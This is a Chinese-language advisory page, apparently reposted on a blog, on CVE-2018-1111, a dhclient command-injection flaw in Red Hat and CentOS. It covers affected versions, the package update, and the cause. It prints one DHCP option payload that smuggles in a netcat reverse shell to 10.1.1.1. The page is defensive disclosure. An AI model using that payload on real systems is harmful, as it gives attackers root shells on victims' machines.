91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Red Hat DHCP客戶端命令執行漏洞是怎么樣的

發布時間:2021-12-20 19:39:56 來源:億速云 閱讀:106 作者:柒染 欄目:大數據

這篇文章給大家介紹Red Hat  DHCP客戶端命令執行漏洞是怎么樣的,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

0x00 漏洞概述

近日,紅帽官方發布了安全更新,修復了編號為CVE-2018-1111的遠程代碼執行漏洞,攻擊者可以通過偽造DHCP服務器發送響應包,攻擊紅帽系統,獲取root權限并執行任意命令。

目前相關利用代碼已經公開,可用于本地網絡攻擊;360-CERT此漏洞進行了技術分析,認為該漏洞危害等級嚴重,建議使用相關用戶盡快進行更新。

Red Hat  DHCP客戶端命令執行漏洞是怎么樣的

0x01 漏洞影響面

影響版本
  • Red Hat Enterprise Linux Server 6

  • Red Hat Enterprise Linux Server 7

  • CentOS 6

  • CentOS 7

修復方案
  • 受影響產品的更新

Red Hat  DHCP客戶端命令執行漏洞是怎么樣的

  • 軟件包更新

      #yum update dhclient 
     #rpm -qa --changelog dhclient  | grep CVE-2018
         - Resolves: #1570898 - Fix CVE-2018-1111: Do not parse backslash as escape character

0x02 漏洞詳情

DHCP 是一個局域網的網絡協議,主要用于內部網絡動態IP地址分配。

Red Hat提供的DHCP客戶端軟件包dhclient的腳本為/etc/NetworkManager/dispatcher.d/11-dhclient(Red Hat Enterprise Linux 7)和/etc/NetworkManager/dispatcher.d/10-dhclient(Red Hat Enterprise Linux 6);當NetworkManager組件從DHCP服務器收到DHCP響應時執行該腳本。

Red Hat  DHCP客戶端命令執行漏洞是怎么樣的

使用單引號使參數值逃逸成功,導致了命令執行

--dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"

關于Red Hat  DHCP客戶端命令執行漏洞是怎么樣的就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

含山县| 镇远县| 原平市| 万荣县| 无棣县| 宁明县| 南溪县| 彰化市| 九龙城区| 三门县| 璧山县| 丰顺县| 清远市| 嘉善县| 山阳县| 武山县| 保康县| 兴城市| 维西| 济阳县| 丰原市| 阿鲁科尔沁旗| 惠安县| 汶川县| 东城区| 驻马店市| 根河市| 莱芜市| 德庆县| 凤翔县| 萨迦县| 大化| 清河县| 延庆县| 大洼县| 林西县| 宁陵县| 鄢陵县| 沛县| 建水县| 平果县|